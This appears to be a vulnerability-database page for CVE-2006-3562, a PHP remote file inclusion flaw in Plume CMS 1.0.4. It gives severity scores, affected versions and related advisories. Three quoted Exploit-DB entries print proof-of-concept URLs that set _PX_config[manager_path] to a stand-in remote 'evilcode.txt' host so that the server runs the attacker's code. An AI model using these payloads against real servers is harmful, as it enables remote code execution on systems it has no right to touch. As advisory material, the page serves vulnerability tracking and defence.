CVE-2006-3562
published 2006-07-13CVE-2006-3562: PHP remote file inclusion vulnerabilities in plume cms 1.0.4 allow remote attackers to execute arbitrary PHP code via a URL in the _PX_config[manager_path]…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.06%
85.9th percentile
PHP remote file inclusion vulnerabilities in plume cms 1.0.4 allow remote attackers to execute arbitrary PHP code via a URL in the _PX_config[manager_path] parameter to (1) index.php, (2) rss.php, or (3) search.php, a different set of vectors and versions than CVE-2006-2645 and CVE-2006-0725.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| plume-cms | plume_cms | <= 1.0.6 | — |
| plume-cms | plume_cms | — | — |
| plume-cms | plume_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9rrg-ppwx-5r5f: Multiple PHP remote file inclusion vulnerabilities in Plume CMS 1
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2006-4533 [MEDIUM] CWE-94 GHSA-9rrg-ppwx-5r5f: Multiple PHP remote file inclusion vulnerabilities in Plume CMS 1
Multiple PHP remote file inclusion vulnerabilities in Plume CMS 1.0.6 and earlier allow remote attackers to execute arbitrary PHP code via the _PX_config[manager_path] parameter to (1) articles.php, (2) categories.php, (3) news.php, (4) prefs.php, (5) sites.php, (6) subtypes.php, (7) users.php, (8) xmedia.php, (9) frontinc/class.template.php, (10) inc/lib.text.php, (11) install/index.php, (12) install/upgrade.php, and (13) tools/htaccess/index.php. NOTE: other vectors are covered by CVE-2006-3562, CVE-2006-2645, and CVE-2006-0725.
GHSA
GHSA-vr4r-48mr-4g42: PHP remote file inclusion vulnerabilities in plume cms 1
ghsa_unreviewed·2022-05-01·CVSS 6.8
CVE-2006-3562 [MEDIUM] CWE-94 GHSA-vr4r-48mr-4g42: PHP remote file inclusion vulnerabilities in plume cms 1
PHP remote file inclusion vulnerabilities in plume cms 1.0.4 allow remote attackers to execute arbitrary PHP code via a URL in the _PX_config[manager_path] parameter to (1) index.php, (2) rss.php, or (3) search.php, a different set of vectors and versions than CVE-2006-2645 and CVE-2006-0725.
No detection rules found.
Exploit-DB
Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion
exploitdb·2007-07-03
CVE-2006-3562 Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion
Plume CMS 1.0.4 - 'index.php?_PX_config[manager_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18780/info
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
http://www.example.com/(path)/index.php?_PX_config[manager_path]=http://evilcode.txt?
Exploit-DB
Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion
exploitdb·2007-07-03
CVE-2006-3562 Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion
Plume CMS 1.0.4 - 'rss.php?_PX_config[manager_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18780/info
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
http://www.example.com/(path)/rss.php?_PX_config[manager_path]=http://evilcode.txt?
Exploit-DB
Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion
exploitdb·2006-07-03
CVE-2006-3562 Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion
Plume CMS 1.0.4 - 'search.php?_PX_config[manager_path]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18780/info
Plume CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows the attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
http://www.example.com/(path)/search.php?_PX_config[manager_path]=http://evilcode.txt?
No writeups or analysis indexed.
http://securityreason.com/securityalert/1220http://securitytracker.com/id?1016426http://www.securityfocus.com/archive/1/438948/100/100/threadedhttp://www.securityfocus.com/bid/18780https://exchange.xforce.ibmcloud.com/vulnerabilities/27530http://securityreason.com/securityalert/1220http://securitytracker.com/id?1016426http://www.securityfocus.com/archive/1/438948/100/100/threadedhttp://www.securityfocus.com/bid/18780https://exchange.xforce.ibmcloud.com/vulnerabilities/27530
2006-07-13
Published